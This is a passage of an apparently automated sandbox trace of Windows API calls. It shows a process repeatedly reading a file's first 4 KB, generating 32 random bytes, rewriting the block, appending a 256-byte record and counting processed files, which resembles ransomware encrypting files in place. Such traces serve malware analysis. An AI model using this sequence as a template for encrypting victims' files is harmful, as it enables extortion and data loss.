SetFilePointerEx (in: hFile=0x890, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.615] GetProcessHeap () returned 0x4f10000 [0081.615] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f770 [0081.615] GetProcessHeap () returned 0x4f10000 [0081.615] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x20) returned 0x7d56870 [0081.615] SystemFunction036 (in: RandomBuffer=0x7d56870, RandomBufferLength=0x20 | out: RandomBuffer=0x7d56870) returned 1 [0081.615] GetProcessHeap () returned 0x4f10000 [0081.615] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x1000) returned 0x8b600d0 [0081.615] ReadFile (in: hFile=0x890, lpBuffer=0x8b600d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesRead=0x758fd08*=0x1000, lpOverlapped=0x0) returned 1 [0081.663] SetFilePointerEx (in: hFile=0x890, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.663] WriteFile (in: hFile=0x890, lpBuffer=0x8b600d0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesWritten=0x758fd44*=0x1000, lpOverlapped=0x0) returned 1 [0081.663] GetProcessHeap () returned 0x4f10000 [0081.663] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12358 [0081.664] GetProcessHeap () returned 0x4f10000 [0081.664] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0081.664] GetProcessHeap () returned 0x4f10000 [0081.664] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x8, Ptr=0x7d12368, Size=0x20) returned 0x7d56528 [0081.664] GetProcessHeap () returned 0x4f10000 [0081.664] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0081.664] GetProcessHeap () returned 0x4f10000 [0081.664] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x7d12368, Size=0x20) returned 0x7d56898 [0081.664] GetProcessHeap () returned 0x4f10000 [0081.664] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0081.664] GetProcessHeap () returned 0x4f10000 [0081.664] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0081.664] GetProcessHeap () returned 0x4f10000 [0081.664] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0081.664] GetProcessHeap () returned 0x4f10000 [0081.664] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0081.664] GetProcessHeap () returned 0x4f10000 [0081.664] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0081.664] GetProcessHeap () returned 0x4f10000 [0081.664] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0081.664] GetProcessHeap () returned 0x4f10000 [0081.664] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0081.664] GetProcessHeap () returned 0x4f10000 [0081.664] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0081.664] GetProcessHeap () returned 0x4f10000 [0081.664] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0081.664] GetProcessHeap () returned 0x4f10000 [0081.664] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0081.664] GetProcessHeap () returned 0x4f10000 [0081.664] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0081.664] GetProcessHeap () returned 0x4f10000 [0081.664] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0081.664] GetProcessHeap () returned 0x4f10000 [0081.664] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0081.664] GetProcessHeap () returned 0x4f10000 [0081.664] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0081.664] GetProcessHeap () returned 0x4f10000 [0081.664] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0081.664] GetProcessHeap () returned 0x4f10000 [0081.664] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0081.665] GetProcessHeap () returned 0x4f10000 [0081.665] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0081.665] GetProcessHeap () returned 0x4f10000 [0081.665] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0081.665] GetProcessHeap () returned 0x4f10000 [0081.665] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0081.665] GetProcessHeap () returned 0x4f10000 [0081.665] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0081.665] GetProcessHeap () returned 0x4f10000 [0081.665] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0081.665] GetProcessHeap () returned 0x4f10000 [0081.665] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0081.665] GetProcessHeap () returned 0x4f10000 [0081.665] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0081.665] GetProcessHeap () returned 0x4f10000 [0081.665] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0081.665] GetProcessHeap () returned 0x4f10000 [0081.665] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0081.665] GetProcessHeap () returned 0x4f10000 [0081.665] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0081.665] GetProcessHeap () returned 0x4f10000 [0081.665] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0081.665] GetProcessHeap () returned 0x4f10000 [0081.665] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0081.665] GetProcessHeap () returned 0x4f10000 [0081.665] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0081.665] GetProcessHeap () returned 0x4f10000 [0081.665] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0081.665] GetProcessHeap () returned 0x4f10000 [0081.665] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0081.665] GetProcessHeap () returned 0x4f10000 [0081.665] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0081.665] GetProcessHeap () returned 0x4f10000 [0081.665] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0081.665] GetProcessHeap () returned 0x4f10000 [0081.665] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x24) returned 0x7d4bb68 [0081.665] GetProcessHeap () returned 0x4f10000 [0081.665] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0081.665] GetProcessHeap () returned 0x4f10000 [0081.665] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x40) returned 0x7d51418 [0081.666] GetProcessHeap () returned 0x4f10000 [0081.666] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d4bb68 | out: hHeap=0x4f10000) returned 1 [0081.666] GetProcessHeap () returned 0x4f10000 [0081.666] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f70a70 [0081.666] GetProcessHeap () returned 0x4f10000 [0081.666] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d51418 | out: hHeap=0x4f10000) returned 1 [0081.666] GetProcessHeap () returned 0x4f10000 [0081.666] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f878 [0081.666] GetProcessHeap () returned 0x4f10000 [0081.666] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f70a70 | out: hHeap=0x4f10000) returned 1 [0081.666] GetProcessHeap () returned 0x4f10000 [0081.666] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x1f8) returned 0x7cf6bf8 [0081.666] GetProcessHeap () returned 0x4f10000 [0081.666] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f878 | out: hHeap=0x4f10000) returned 1 [0081.666] GetProcessHeap () returned 0x4f10000 [0081.666] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0081.666] GetProcessHeap () returned 0x4f10000 [0081.666] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0081.666] GetProcessHeap () returned 0x4f10000 [0081.666] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0081.666] GetProcessHeap () returned 0x4f10000 [0081.666] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0081.666] GetProcessHeap () returned 0x4f10000 [0081.666] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0081.666] GetProcessHeap () returned 0x4f10000 [0081.666] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0081.666] GetProcessHeap () returned 0x4f10000 [0081.666] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0081.666] GetProcessHeap () returned 0x4f10000 [0081.666] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0081.666] GetProcessHeap () returned 0x4f10000 [0081.667] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0081.667] GetProcessHeap () returned 0x4f10000 [0081.667] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0081.667] GetProcessHeap () returned 0x4f10000 [0081.667] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0081.667] GetProcessHeap () returned 0x4f10000 [0081.667] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0081.667] GetProcessHeap () returned 0x4f10000 [0081.667] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0081.667] GetProcessHeap () returned 0x4f10000 [0081.667] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0081.667] GetProcessHeap () returned 0x4f10000 [0081.667] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0081.667] GetProcessHeap () returned 0x4f10000 [0081.667] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0081.667] GetProcessHeap () returned 0x4f10000 [0081.667] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0081.667] GetProcessHeap () returned 0x4f10000 [0081.667] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0081.667] GetProcessHeap () returned 0x4f10000 [0081.667] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0081.667] GetProcessHeap () returned 0x4f10000 [0081.667] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0081.667] GetProcessHeap () returned 0x4f10000 [0081.667] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0081.667] GetProcessHeap () returned 0x4f10000 [0081.667] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0081.667] GetProcessHeap () returned 0x4f10000 [0081.667] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0081.668] GetProcessHeap () returned 0x4f10000 [0081.668] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0081.668] GetProcessHeap () returned 0x4f10000 [0081.668] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x220) returned 0x7cf6bf8 [0081.668] GetProcessHeap () returned 0x4f10000 [0081.668] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0081.668] GetProcessHeap () returned 0x4f10000 [0081.668] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12358 | out: hHeap=0x4f10000) returned 1 [0081.668] GetProcessHeap () returned 0x4f10000 [0081.668] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56898 | out: hHeap=0x4f10000) returned 1 [0081.668] GetProcessHeap () returned 0x4f10000 [0081.668] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0081.668] GetProcessHeap () returned 0x4f10000 [0081.668] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56528 | out: hHeap=0x4f10000) returned 1 [0081.668] SetFilePointerEx (in: hFile=0x890, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.668] WriteFile (in: hFile=0x890, lpBuffer=0x7d7f770*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x7d7f770*, lpNumberOfBytesWritten=0x758fd44*=0x100, lpOverlapped=0x0) returned 1 [0081.668] WriteFile (in: hFile=0x890, lpBuffer=0x758fd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x758fd48*, lpNumberOfBytesWritten=0x758fd44*=0x4, lpOverlapped=0x0) returned 1 [0081.668] GetProcessHeap () returned 0x4f10000 [0081.668] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b600d0 | out: hHeap=0x4f10000) returned 1 [0081.668] GetProcessHeap () returned 0x4f10000 [0081.668] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56870 | out: hHeap=0x4f10000) returned 1 [0081.668] GetProcessHeap () returned 0x4f10000 [0081.668] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f770 | out: hHeap=0x4f10000) returned 1 [0081.669] CloseHandle (hObject=0x890) returned 1 [0081.670] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 69 [0081.670] SetFilePointerEx (in: hFile=0x894, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.670] ReadFile (in: hFile=0x894, lpBuffer=0x758fd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x758fd4c*, lpNumberOfBytesRead=0x758fd08*=0x0, lpOverlapped=0x0) returned 1 [0081.670] SetFilePointerEx (in: hFile=0x894, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.670] GetProcessHeap () returned 0x4f10000 [0081.670] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f770 [0081.671] GetProcessHeap () returned 0x4f10000 [0081.671] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x20) returned 0x7d56870 [0081.671] SystemFunction036 (in: RandomBuffer=0x7d56870, RandomBufferLength=0x20 | out: RandomBuffer=0x7d56870) returned 1 [0081.671] GetProcessHeap () returned 0x4f10000 [0081.671] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x1000) returned 0x8b600d0 [0081.671] ReadFile (in: hFile=0x894, lpBuffer=0x8b600d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesRead=0x758fd08*=0x1000, lpOverlapped=0x0) returned 1 [0081.724] SetFilePointerEx (in: hFile=0x894, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.724] WriteFile (in: hFile=0x894, lpBuffer=0x8b600d0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesWritten=0x758fd44*=0x1000, lpOverlapped=0x0) returned 1 [0081.724] GetProcessHeap () returned 0x4f10000 [0081.724] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12358 [0081.724] GetProcessHeap () returned 0x4f10000 [0081.724] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0081.724] GetProcessHeap () returned 0x4f10000 [0081.724] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x8, Ptr=0x7d12368, Size=0x20) returned 0x7d56528 [0081.724] GetProcessHeap () returned 0x4f10000 [0081.724] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0081.724] GetProcessHeap () returned 0x4f10000 [0081.724] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x7d12368, Size=0x20) returned 0x7d56898 [0081.724] GetProcessHeap () returned 0x4f10000 [0081.724] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0081.724] GetProcessHeap () returned 0x4f10000 [0081.724] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0081.724] GetProcessHeap () returned 0x4f10000 [0081.724] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0081.724] GetProcessHeap () returned 0x4f10000 [0081.724] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0081.724] GetProcessHeap () returned 0x4f10000 [0081.724] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0081.724] GetProcessHeap () returned 0x4f10000 [0081.724] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0081.724] GetProcessHeap () returned 0x4f10000 [0081.724] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0081.724] GetProcessHeap () returned 0x4f10000 [0081.724] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0081.724] GetProcessHeap () returned 0x4f10000 [0081.725] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0081.725] GetProcessHeap () returned 0x4f10000 [0081.725] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0081.725] GetProcessHeap () returned 0x4f10000 [0081.725] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0081.725] GetProcessHeap () returned 0x4f10000 [0081.725] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0081.725] GetProcessHeap () returned 0x4f10000 [0081.725] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0081.725] GetProcessHeap () returned 0x4f10000 [0081.725] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0081.725] GetProcessHeap () returned 0x4f10000 [0081.725] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0081.725] GetProcessHeap () returned 0x4f10000 [0081.725] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0081.725] GetProcessHeap () returned 0x4f10000 [0081.725] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0081.725] GetProcessHeap () returned 0x4f10000 [0081.725] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0081.725] GetProcessHeap () returned 0x4f10000 [0081.725] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0081.725] GetProcessHeap () returned 0x4f10000 [0081.725] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0081.725] GetProcessHeap () returned 0x4f10000 [0081.725] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0081.725] GetProcessHeap () returned 0x4f10000 [0081.725] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0081.725] GetProcessHeap () returned 0x4f10000 [0081.725] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0081.725] GetProcessHeap () returned 0x4f10000 [0081.725] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0081.725] GetProcessHeap () returned 0x4f10000 [0081.725] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0081.725] GetProcessHeap () returned 0x4f10000 [0081.725] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0081.725] GetProcessHeap () returned 0x4f10000 [0081.725] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0081.725] GetProcessHeap () returned 0x4f10000 [0081.725] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0081.726] GetProcessHeap () returned 0x4f10000 [0081.726] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0081.726] GetProcessHeap () returned 0x4f10000 [0081.726] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0081.726] GetProcessHeap () returned 0x4f10000 [0081.726] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0081.726] GetProcessHeap () returned 0x4f10000 [0081.726] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0081.726] GetProcessHeap () returned 0x4f10000 [0081.726] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0081.726] GetProcessHeap () returned 0x4f10000 [0081.726] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x24) returned 0x7d4bb68 [0081.726] GetProcessHeap () returned 0x4f10000 [0081.726] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0081.726] GetProcessHeap () returned 0x4f10000 [0081.726] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x40) returned 0x7d51418 [0081.726] GetProcessHeap () returned 0x4f10000 [0081.726] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d4bb68 | out: hHeap=0x4f10000) returned 1 [0081.726] GetProcessHeap () returned 0x4f10000 [0081.726] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f70a70 [0081.726] GetProcessHeap () returned 0x4f10000 [0081.726] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d51418 | out: hHeap=0x4f10000) returned 1 [0081.726] GetProcessHeap () returned 0x4f10000 [0081.726] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f878 [0081.726] GetProcessHeap () returned 0x4f10000 [0081.726] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f70a70 | out: hHeap=0x4f10000) returned 1 [0081.726] GetProcessHeap () returned 0x4f10000 [0081.726] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0081.726] GetProcessHeap () returned 0x4f10000 [0081.726] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f878 | out: hHeap=0x4f10000) returned 1 [0081.726] GetProcessHeap () returned 0x4f10000 [0081.726] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0081.726] GetProcessHeap () returned 0x4f10000 [0081.726] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0081.726] GetProcessHeap () returned 0x4f10000 [0081.726] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0081.727] GetProcessHeap () returned 0x4f10000 [0081.727] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0081.727] GetProcessHeap () returned 0x4f10000 [0081.727] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0081.727] GetProcessHeap () returned 0x4f10000 [0081.727] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0081.727] GetProcessHeap () returned 0x4f10000 [0081.727] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0081.727] GetProcessHeap () returned 0x4f10000 [0081.727] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0081.727] GetProcessHeap () returned 0x4f10000 [0081.727] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0081.727] GetProcessHeap () returned 0x4f10000 [0081.727] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0081.727] GetProcessHeap () returned 0x4f10000 [0081.727] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0081.727] GetProcessHeap () returned 0x4f10000 [0081.727] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0081.727] GetProcessHeap () returned 0x4f10000 [0081.727] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0081.727] GetProcessHeap () returned 0x4f10000 [0081.727] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0081.727] GetProcessHeap () returned 0x4f10000 [0081.727] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0081.727] GetProcessHeap () returned 0x4f10000 [0081.727] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 